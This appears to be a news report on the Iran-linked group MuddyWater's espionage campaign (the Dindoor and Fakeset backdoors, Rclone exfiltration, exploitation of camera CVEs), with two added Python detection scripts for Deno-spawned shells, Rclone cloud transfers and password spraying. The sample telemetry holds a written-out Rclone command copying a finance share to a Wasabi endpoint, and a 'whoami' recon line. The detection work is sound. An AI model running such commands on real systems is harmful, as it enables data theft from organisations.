Iranian Cyber Espionage Activity Detected in Multiple U.S. Networks
Security researchers have uncovered evidence that an Iranian state-linked hacking group has infiltrated the networks of several organizations in North America, including banks, airports, and non-profit groups.
The investigation, conducted by security teams at Broadcom’s Symantec and Carbon Black, attributes the activity to the well-known cyber-espionage group MuddyWater, also called Seedworm. The group is believed to operate under Iran’s Ministry of Intelligence and Security (MOIS).
Researchers say the campaign appears to have started in early February, with additional suspicious activity discovered after recent military tensions involving the United States, Israel, and Iran.
Defense Supply Chain May Have Been a Key Target
Among the affected organizations was a software company connected to the defense and aerospace industries. Investigators believe the attackers may have been particularly interested in the company’s Israeli operations, which could have provided access to sensitive technology or strategic information.
Security analysts also observed activity affecting a U.S. financial institution and a Canadian non-profit organization, suggesting that the attackers were exploring multiple entry points across different sectors.
Newly Discovered Backdoor Used in the Attacks
During the investigation, researchers identified a previously unknown backdoor named Dindoor.
This malware uses the Deno JavaScript runtime environment to execute malicious commands on compromised systems. Dindoor appears to give attackers long-term access to targeted networks.
Analysts also found signs that attackers attempted to move stolen data from one of the compromised networks using Rclone, a tool often used for transferring files to cloud storage. The suspected destination was a Wasabi cloud storage bucket, though investigators could not confirm whether any data was successfully exfiltrated.
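The two tooling patterns described above (a Deno runtime spawning shells, and Rclone pushing data to a public object-storage endpoint such as Wasabi) are both visible in ordinary process-creation telemetry. The following is an added detection example, not code from the researchers or from the article; the JSON field names (`host`, `parent`, `image`, `cmdline`) and the sample events are constructed assumptions rather than a specific EDR schema, and the endpoint patterns are limited to the providers the article names plus the generic S3 flag.

```python
"""Added example: flag process-creation events matching the tooling described in
the article (Deno-spawned shells, Rclone transfers to cloud object storage).
All events below are constructed; field names are assumptions, not a real schema."""
from __future__ import annotations

import json
import re
from typing import Iterable, List

# Constructed sample JSON process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    r'{"host": "ws-042", "parent": "C:\\Users\\alice\\AppData\\Local\\deno\\deno.exe", '
    r'"image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"}',
    r'{"host": "ws-042", "parent": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "cmdline": "chrome.exe"}',
    r'{"host": "fs-01", "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"image": "C:\\Users\\Public\\rclone.exe", '
    r'"cmdline": "rclone.exe copy C:\\share\\finance remote:bucket --s3-endpoint s3.wasabisys.com"}',
    r'{"host": "fs-01", "parent": "C:\\Windows\\System32\\services.exe", '
    r'"image": "C:\\Tools\\rclone.exe", "cmdline": "rclone.exe sync D:\\backups backup:nightly"}',
]

# The Deno runtime named in the article; a JavaScript runtime launching a shell is
# unusual on most endpoints and is the behaviour worth surfacing.
RUNTIME_PARENTS = {"deno", "deno.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}
RCLONE = {"rclone", "rclone.exe"}
# Public object-storage providers named in the article (Wasabi, Backblaze), generic
# S3 hosts, and rclone's explicit S3 endpoint flag.
CLOUD_ENDPOINT = re.compile(
    r"wasabisys\.com|backblazeb2\.com|amazonaws\.com|--s3-endpoint", re.IGNORECASE
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> List[str]:
    """Return the detection rule names that a single event matches."""
    parent = basename(event.get("parent", ""))
    image = basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    rules = []
    if parent in RUNTIME_PARENTS and image in SHELLS:
        rules.append("deno-spawned-shell")
    if image in RCLONE:
        # Any rclone run is worth a look; one aimed at a public storage endpoint
        # is the exfiltration shape described in the article.
        rules.append("rclone-cloud-endpoint" if CLOUD_ENDPOINT.search(cmdline) else "rclone-execution")
    return rules


def scan_events(lines: Iterable[str]) -> List[dict]:
    """Parse JSON event lines and return one alert per matched rule."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry instead of stopping the pipeline
        for rule in classify(event):
            alerts.append({"host": event.get("host"), "rule": rule, "cmdline": event.get("cmdline")})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['host']}: {alert['cmdline']}")
```

The plain `rclone-execution` hit on a scheduled backup job is deliberately kept as a lower-severity finding: the tool is legitimate, so the useful triage signal is the combination of an unexpected parent, an unusual install path, and a destination outside the organisation's approved storage.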

Python-Based Backdoor Found in Additional Networks
Another malware tool discovered during the investigation is a Python-based backdoor called Fakeset.
This malicious software was downloaded from servers belonging to Backblaze, a cloud storage and backup provider. Interestingly, the digital certificate used to sign Fakeset had previously been linked to other malware families associated with MuddyWater, including Stagecomp and Darkcomp.
Even though these malware strains were not directly observed in the compromised networks, the reuse of the same certificates strongly suggests that the same Iranian threat actor was behind the activity.
Iranian Cyber Capabilities Continue to Evolve
Security experts say Iranian cyber groups have become more advanced over the past several years.
Their operations now often combine:
- Malware deployment
- Social engineering attacks
- Spear-phishing campaigns
- Online relationship manipulation tactics sometimes known as “honeytrap” operations
These techniques help attackers gain access to corporate accounts, sensitive data, or internal networks.
Cyber Attacks Rising Amid Middle East Tensions
The discovery comes during a period of rising geopolitical tensions in the Middle East, where cyber operations are increasingly used alongside traditional military strategies.
Recent investigations have also identified activity from Handala Hack, a pro-Palestinian hacktivist group that reportedly routed cyber operations through Starlink IP ranges while scanning internet-exposed systems for security weaknesses.

Iranian Hackers Target Security Cameras
Other Iran-linked groups have been observed scanning for vulnerabilities in internet-connected security cameras and video intercom systems.
Researchers found attempts to exploit known flaws in devices from manufacturers such as Hikvision and Dahua.
Several vulnerabilities are being targeted, including:
- CVE-2017-7921
- CVE-2023-6895
- CVE-2021-36260
- CVE-2021-33044
- CVE-2025-34067
These attacks have been detected across several regions, including Israel, the Gulf states, Lebanon, and Cyprus.
Security experts believe compromised camera systems could potentially provide real-time intelligence for military operations or help assess the impact of missile strikes.
Global Cyber Activity Linked to the Conflict
Cybersecurity analysts have also reported several other developments connected to the ongoing geopolitical situation.
Some of the notable incidents include:
- Claims that Israeli intelligence monitored Iranian leadership movements by accessing Tehran’s traffic camera network.
- Reports that Iran’s Islamic Revolutionary Guard Corps (IRGC) targeted an Amazon data center in Bahrain.
- Wiper malware campaigns targeting Israeli energy, finance, government, and utility sectors.
- Multiple Iranian APT groups rapidly updating their cyber tools and infrastructure in preparation for potential retaliatory attacks.
In addition, a coordinated cyber campaign known as #OpIsrael has reportedly targeted government systems and industrial control networks in several countries.

Experts Warn of Possible Retaliatory Cyber Attacks
Cybersecurity agencies are warning that geopolitical conflicts can quickly spill into the digital world.
The Canadian Centre for Cyber Security recently issued an advisory suggesting that Iran could use cyber operations to retaliate against Western countries, potentially targeting critical infrastructure or public information systems.
Experts say Iranian cyber strategy often relies on relatively simple but effective techniques such as:
- Password spraying
- Credential theft
- Social engineering attacks
- Abuse of legitimate enterprise services
Rather than relying heavily on zero-day exploits, Iranian groups often focus on gaining persistent access to cloud accounts and identity systems.
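Password spraying is distinguishable from ordinary brute force precisely because it is low and slow per account: one source tries a few guesses against many users rather than many guesses against one. The following is an added example of that distinction over constructed sign-in events; it is not code from the article or from any agency named in it, and the thresholds, time window and IP addresses (RFC 5737 test ranges) are assumptions chosen for illustration.

```python
"""Added example: separate password spraying from brute force in sign-in logs.
Events are constructed (timestamp, source_ip, username, outcome) tuples; the
thresholds are illustrative assumptions, not an authoritative standard."""
from __future__ import annotations

from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Tuple

Event = Tuple[str, str, str, str]


def _ev(minute: int, ip: str, user: str, outcome: str = "failure") -> Event:
    """Build one constructed sign-in event at 09:<minute> on a fixed day."""
    return (f"2024-05-01T09:{minute:02d}:00", ip, user, outcome)


# Constructed sample: one spraying source, one brute-forcing source, one normal user.
SAMPLE_AUTH = (
    [_ev(i, "203.0.113.7", user) for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [_ev(10 + i // 2, "198.51.100.9", "admin") for i in range(12)]
    + [_ev(20, "192.0.2.44", "alice"), _ev(21, "192.0.2.44", "alice", "success")]
)


def classify_sources(
    events: Iterable[Event],
    window: timedelta = timedelta(minutes=30),
    min_users: int = 5,      # distinct accounts a single source must touch
    max_per_user: int = 2,   # sprays stay under lockout thresholds per account
    brute_threshold: int = 10,
) -> Dict[str, str]:
    """Return a verdict per source IP: password-spray, brute-force or normal."""
    failures = defaultdict(list)
    for ts, ip, user, outcome in events:
        if outcome == "failure":
            failures[ip].append((datetime.fromisoformat(ts), user))

    verdicts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        verdict = "normal"
        start = 0
        # Sliding window over this source's failures, oldest to newest.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in attempts[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                verdict = "password-spray"   # many accounts, few tries each
                break
            if len(per_user) == 1 and sum(per_user.values()) >= brute_threshold:
                verdict = "brute-force"      # one account, many tries
                break
        verdicts[ip] = verdict
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_AUTH).items():
        print(f"{ip:>14}  {verdict}")
```

Because a spray never trips a per-account lockout, per-user failure counters alone will not catch it; the grouping has to be by source (or by shared user agent or ASN when the attacker rotates addresses), which is why the function keys its window on the IP rather than the username.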
How Organizations Can Strengthen Their Defenses
Security specialists recommend that organizations take several steps to reduce their exposure to these types of cyber threats.
Key defensive measures include:
- Strengthening monitoring and threat detection capabilities
- Limiting internet exposure of internal systems
- Disabling unnecessary remote access to operational technology networks
- Implementing phishing-resistant multi-factor authentication
- Segmenting networks to prevent lateral movement
- Maintaining offline backups of critical data
- Keeping VPN gateways and internet-facing systems fully updated
Security experts also warn that cyber activity linked to geopolitical tensions may escalate further in the coming months.
Organizations are encouraged to remain vigilant as cyber operations increasingly become a tool of international conflict.

